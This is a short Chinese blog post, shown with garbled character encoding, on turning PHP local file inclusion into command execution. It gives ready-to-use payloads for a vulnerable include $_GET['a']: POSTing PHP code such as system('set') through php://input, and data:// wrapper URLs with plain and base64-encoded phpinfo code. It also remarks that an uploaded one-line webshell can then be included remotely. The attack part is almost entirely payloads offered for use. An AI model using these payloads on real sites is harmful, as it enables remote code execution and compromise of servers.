= 5.2.0【優(yōu)勢(shì)】直接POST php代碼并執(zhí)行【須知】必須使用包含切執(zhí)行函數(shù)(比如 include require) 不能使用file_g..."/>
溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

LFI 命令執(zhí)行

發(fā)布時(shí)間:2020-06-21 07:34:19 來(lái)源:網(wǎng)絡(luò) 閱讀:566 作者:serverxx0 欄目:安全技術(shù)

條件:

【條件】在allow_url_include = On 且 PHP >= 5.2.0

【優(yōu)勢(shì)】直接POST php代碼并執(zhí)行

【須知】必須使用包含切執(zhí)行函數(shù)(比如 include require) 不能使用file_get_contents等 用這些函數(shù)不會(huì)執(zhí)行data/input里面函數(shù)。

【點(diǎn)評(píng)】這其實(shí)是一種思路而已  當(dāng)allow_url_include打開的時(shí)候  隨便找個(gè)webshell上傳一句話都可以遠(yuǎn)程包含了。

php://input

0x007.com/data.php?a=php://input

post提交:<?php  system("set");?>  任意的php代碼


data:

include $_GET['a'];

0x007.com/data.php?a=data:text/plain,<?php phpinfo();

0x007.com/data.php?a=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=

0x007.com/data.php?a=data:;base64,PD9waHBpbmZvKCk7Lyo=


向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI